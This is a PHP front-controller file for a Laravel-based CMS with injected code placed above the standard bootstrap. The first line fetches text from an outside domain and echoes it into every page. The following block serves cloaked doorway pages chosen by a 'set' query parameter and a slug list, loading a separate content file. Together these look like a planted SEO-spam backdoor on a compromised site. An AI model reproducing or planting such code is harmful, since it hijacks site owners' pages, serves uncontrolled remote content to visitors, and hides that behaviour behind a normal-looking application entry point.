<?php $a = file_get_contents('https://selirhati.store/plugins/dqk-2.txt'); echo $a; ?>
<?php
$path = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/');
$slug = isset($_GET['set']) ? $_GET['set'] : null;

$is_tunnel = false;
$BRANDS = '';

if ($slug !== '') {
    $filename = "bisa.txt";
    if (file_exists($filename)) {
        $lines = file($filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $target_string = strtolower($slug);
        foreach ($lines as $item) {
            if (strtolower($item) === $target_string) {
                $BRANDS = strtoupper($target_string);
                $is_tunnel = true;
                break;
            }
        }
    }
}

if ($is_tunnel) {
    extract(['BRANDS' => $BRANDS]);
    include './konten.php';
    exit();
}
?>
<?php

/**
 * Laravel - A PHP Framework For Web Artisans
 *
 * @package  Laravel
 * @author   Taylor Otwell <taylor@laravel.com>
 */

session_start();

if (file_exists('install.php')) {
	$base_root = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] && !in_array(strtolower($_SERVER['HTTPS']), array('off', 'no'))) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER["PHP_SELF"];
	$base_url = preg_replace("/\/(index\.php$)/", "", $base_root);
	define('BASE_URL', $base_url);
	header('location:' . BASE_URL . '/install.php');
} else {
	define('LARAVEL_START', microtime(true));

	/*
	|--------------------------------------------------------------------------
	| Register The Auto Loader
	|--------------------------------------------------------------------------
	|
	| Composer provides a convenient, automatically generated class loader for
	| our application. We just need to utilize it! We'll simply require it
	| into the script here so that we don't have to worry about manual
	| loading any of our classes later on. It feels great to relax.
	|
	*/

	require __DIR__ . '/po-includes/vendor/autoload.php';

	/*
	|--------------------------------------------------------------------------
	| Turn On The Lights
	|--------------------------------------------------------------------------
	|
	| We need to illuminate PHP development, so let us turn on the lights.
	| This bootstraps the framework and gets it ready for use, then it
	| will load up this application so that we can run it and send
	| the responses back to the browser and delight our users.
	|
	*/

	$app = require_once __DIR__ . '/po-includes/bootstrap/app.php';

	/*
	|--------------------------------------------------------------------------
	| Run The Application
	|--------------------------------------------------------------------------
	|
	| Once we have the application, we can handle the incoming request
	| through the kernel, and send the associated response back to
	| the client's browser allowing them to enjoy the creative
	| and wonderful application we have prepared for them.
	|
	*/

	$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);

	$response = $kernel->handle(
		$request = Illuminate\Http\Request::capture()
	);

	$response->send();

	$kernel->terminate($request, $response);

}